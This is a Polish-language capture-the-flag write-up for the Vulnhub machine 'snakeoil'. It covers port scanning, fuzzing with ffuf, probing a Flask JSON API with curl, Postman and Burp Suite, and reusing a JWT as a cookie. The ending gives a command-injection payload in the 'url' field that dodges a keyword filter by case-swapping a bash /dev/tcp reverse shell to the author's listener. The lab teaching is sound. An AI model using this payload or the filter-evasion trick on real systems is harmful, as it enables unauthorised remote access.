Digitalworld.local: snakeoil

Write-up is in Polish language.

Metainfo

Nazwa: Digitalworld.local: snakeoil
Autor: Donavan
Wypuszczony: 2021-08-23
Do ściągnięcia: Vulnhub
Poziom: Łatwy
System: Linux
Nauczysz się: Metasploit, JSON, Tokeny

Wstęp

digitalworld.local: snakeoil jest ciekawą i nieszablonową maszyną z paru powodów: wykorzystane są tokeny JWT (JSON Web Token), format JSON (JavaScript Object Notation), możemy na niej przećwiczyć metody HTTP typu GET, POST w popularnych programach. Przećwiczymy to na trzech: tekstowy Curl - link jest tutaj w sumie zbędny, posiada go chyba każde repozytorium, ale podaje dla formalności; drugim programem będzie Burp Suite i trzecim, który ostatnio wpadł mi w oko będzie Postman, który znalazłem na YouTube. Tam też jest instrukcja, jak przejść Snakeoil. Ale zrobimy to po swojemu i się skupimy głównie na programach, które wyżej wymieniłem.

Zaczynamy

Metasploit i Db_nmap

Jeżeli nie chcecie ciągle wpisywać tych samych komend, Metasploit umożliwia nam w pewnym sensie automatyzację. Wystarczy użyć polecenie resource. A jak to działa? Po prostu tworzymy komendy w pliku i potem uruchamiamy wpisując resource [nazwa_zasobów]. Prawda, że proste?

root@kali:/home/szikers/snackoil# echo 'workspace "Snakeoil: 1"' >> snakeoil.rc
root@kali:/home/szikers/snackoil# echo "db_nmap -A -p- 172.16.1.141" >> snakeoil.rc
root@kali:/home/szikers/snackoil# msfconsole
msf6 > resource snakeoil.rc
[*] Processing /home/szikers/snackoil/snakeoil.rc for ERB directives.
resource (/home/szikers/snackoil/snakeoil.rc)> workspace "Snakeoil: 1"
[*] Workspace: Snakeoil: 1
resource (/home/szikers/snackoil/snakeoil.rc)> db_nmap -A -p- 172.16.1.141
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-14 21:31 CEST
[*] Nmap: PORT   STATE SERVICE VERSION
[*] Nmap: 22/tcp  open ssh   OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
[*] Nmap: 80/tcp  open http  nginx 1.14.2
[*] Nmap: 8080/tcp open http  nginx 1.14.2
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds

Po przeskanowaniu wirtualki, widzimy że są otwarte trzy porty. Ten co będzie nas interesować, to port 8080.

Ffuf

Ffuf czyli Fuzz Faster U Fool jest bardzo szybkim fuzzerem bez natłoku funkcji. Wg. mnie ma wszystko co jest potrzebne. Zamiast Dirb lub GoBuster w tym artykule do skanowania użyjemy tylko powyższego fuzzera.

# root@kali:/home/szikers# ffuf -w /usr/share/wordlists/dirb/common.txt -u http://172.16.1.141:8080/FUZZ -mc all -fc 404

    /'___\ /'___\      /'___\
    /\ \__/ /\ \__/ __ __ /\ \__/
    \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
     \ \_\  \ \_\ \ \____/ \ \_\
     \/_/  \/_/  \/___/  \/_/

    v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method      : GET
 :: URL       : http://172.16.1.141:8080/FUZZ
 :: Wordlist     : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration   : false
 :: Timeout     : 10
 :: Threads     : 40
 :: Matcher     : Response status: all
 :: Filter      : Response status: 404
________________________________________________

            [Status: 200, Size: 3391, Words: 772, Lines: 89]
01           [Status: 200, Size: 2193, Words: 338, Lines: 47]
02           [Status: 200, Size: 2356, Words: 361, Lines: 51]
04           [Status: 200, Size: 2326, Words: 353, Lines: 45]
05           [Status: 200, Size: 2121, Words: 328, Lines: 45]
06           [Status: 200, Size: 2156, Words: 328, Lines: 45]
1            [Status: 200, Size: 2193, Words: 338, Lines: 47]
2            [Status: 200, Size: 2356, Words: 361, Lines: 51]
4            [Status: 200, Size: 2326, Words: 353, Lines: 45]
5            [Status: 200, Size: 2121, Words: 328, Lines: 45]
6            [Status: 200, Size: 2156, Words: 328, Lines: 45]
create         [Status: 200, Size: 2596, Words: 447, Lines: 61]
login          [Status: 405, Size: 64, Words: 10, Lines: 2]
registration      [Status: 200, Size: 29, Words: 3, Lines: 2]
run           [Status: 405, Size: 178, Words: 20, Lines: 5]
secret         [Status: 500, Size: 37, Words: 4, Lines: 2]
test          [Status: 200, Size: 17, Words: 2, Lines: 2]
users          [Status: 200, Size: 267, Words: 9, Lines: 2]
:: Progress: [4614/4614] :: Job [1/1] :: 779 req/sec :: Duration: [0:00:06] :: Errors: 0 ::

Prawdę mówiąc w tym wypadku Dirb dałby taki sam wynik, ale we Ffuf można stosować filtry, np. wyszukiwać tylko pliki, które zawierają słowo password.

Metody GET, POST

Ffuf znalazł trochę plików. Interesować nas zaś będą: login, registration, run, secret, zaś users niekoniecznie. Jak widzicie, podczas skanu nie wszystkie zwróciły kod powrotu 200. Niektóre mają 405, a to oznacza, że do przeszukiwania niektórych zasobów używaliśmy niedozwolonych metod - w tym wypadku GET. Plik secret ma kod 500, czyli wewnętrzny błąd serwera.

curl

Widzimy, że kod powrotu dla login wynosi 405, więc GET jest w tym wypadku niedozwoloną metodą. Uruchamiając program Curl z parametrem -I widzimy, że metodami, które można użyć są OPTIONS i POST:

# root@kali:/home/szikers# curl -I http://172.16.1.141:8080/login
HTTP/1.1 405 METHOD NOT ALLOWED
Server: nginx/1.14.2
Date: Tue, 14 Sep 2021 20:56:52 GMT
Content-Type: application/json
Content-Length: 64
Connection: keep-alive
Allow: OPTIONS, POST

Spróbujmy coś zrobić z POST:

# root@kali:/home/szikers# curl -X POST http://172.16.1.141:8080/login
{"message": {"username": "Username field cannot be blank."}}

Już lepiej, mamy odpowiedź, że pole username nie może być puste.

# root@kali:/home/szikers# curl -X POST -H "Content-Type: application/json" -d '{"username":"snackoil"}' http://172.16.1.141:8080/login
{"message": {"password": "Password field cannot be blank."}}

Teraz mamy odpowiedź, że hasło nie może być puste. Kontynuujmy tę przepychankę w programie Postman.

Postman

Postman

Jak widzimy, nie ma użytkownika snackoil. Więc go zakładamy i nadajemy mu hasło poprzez link, potem się logujemy i dostajemy token, który możemy sprawdzić na stronie

xcp

Burp Suite

Pozostaje nam wykorzystać adres z końcówką run. Najpierw wchodzimy na link przez przeglądarkę i przechwytujemy nagłówek poprzez Burp Suite. Potem przechodzimy do sekcji repeater i wysyłamy nagłówek. Podczas tej czynności dostajemy komunikat Method Not Allowed. Więc zamieniamy GET na POST. Należy pamiętać, żeby w nagłówku dodać Content-Type: application/json. Na poniższych rysunkach jest przedstawione jak to wygląda:

Burp Suite

Curl

Okazuje się, że potrzebujemy sekretnego klucza, który jest w urlu http://172.16.1.141:8080/secret:

Wróćmy na chwilę do Curla, ale nie zamykajmy jeszcze okna w Burp Suite. Przechodzimy znowu do Curla. Wchodząc na podany link frameworka Flaska się dowiadujemy, że opcja JWT_ACCESS_COOKIE_NAME umożliwia wysłanie nasz token poprzez ciasteczko, domyślnie się nazywa access_token_cookie.

xcp

Wynika z tego, że musimy podać klucz w ciasteczku (jak to zabrzmiało :smiley: ) i wysłać na serwer:

# root@kali:/home/szikers# curl --cookie "access_token_cookie=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTYzMTczNDE4NywianRpIjoiZjU4NDNhMmUtOTYzOC00NTFlLTg2NDktOTczMGQzNGUzZmUwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6InNuYWNrb2lsIiwibmJmIjoxNjMxNzM0MTg3LCJleHAiOjE2MzE3MzUwODd9.18oenH8p5IsRYLes02qLICWh_wAYXvCxaVib_H-hbmQ" http://172.16.1.141:8080/secret
{"ip-address": "", "secret_key": "commandexecutionissecret"}

Burp Suite

Mamy nasz sekretny klucz. Parametr “url” jest podatny na command injection. Niestety, nie możemy wrzucić stringów typu: bash, /dev/tcp, bo dostajemy bana. Skrypt na serwerze od razu filtruje te słowa, ale możemy zrobić coś innego. Wrzucić klucz publiczny id_rsa.pub do katalogu .ssh, jak to zrobił na filmiku InfoSecLab, albo tak przerobić nasz tekst żeby przeszedł filtry. Zrobimy to drugie. Stworzymy payload, który się będzie łączył na port 12345, ale żeby to zadziałało, to najpierw małe litery w naszym ładunku zamienimy na duże, wrzucimy to wszystko do pliku, potem odwrócimy wielkość liter i uruchomimy nasz skrypt. Oczywiście można to inaczej zrobić, żeby zadziałało. Np. zakodować plik do MD5, potem odkodować, itd… ale zanim wrzucimy nasz ładunek, trzeba włączyć na naszym serwerze nasłuchiwanie na porcie 12345.

# nc -lvp 12345

A w naszym nagłówku umieszczamy takie coś:

POST /run HTTP/1.1 Host: 172.16.1.141:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Content-Type: application/json Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Length: 227 { "url":"--help >/dev/null ; echo '#!/BIN/BASH' >1.sh; echo 'BASH -i > /DEV/TCP/172.16.1.10/12345 0>&1 2>&1' >> 1.sh; tr [:upper:] [:lower:] <1.sh > 2.sh; chmod +x 2.sh; ./2.sh ;", "secret_key":"commandexecutionissecret" }

Koniec

Wysyłamy nagłówek i jesteśmy na patrick@SNAKEOIL. Na koniec podpowiem, że interesuje nas plik flask_blog/app.py. Tam znajdziecie co trzeba.

Mam nadzieję, że ten tutorial pomógł wam trochę poćwiczyć JSON oraz metody GET i POST.

Zostaw komentarz